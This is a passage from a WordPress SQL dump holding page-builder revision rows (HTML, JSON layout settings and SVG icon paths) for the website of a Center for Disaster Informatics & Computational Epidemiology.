infrastructure</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">Impact assessment</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 18:36:34','2022-02-16 18:36:34','',20,'https://gsudice.dataconn.net/?p=403',0,'revision','',0),(404,1,'2022-02-16 18:36:34','2022-02-16 18:36:34','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 18:36:34','2022-02-16 18:36:34','',23,'https://gsudice.dataconn.net/?p=404',0,'revision','',0),(405,1,'2022-02-16 18:36:34','2022-02-16 18:36:34','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path 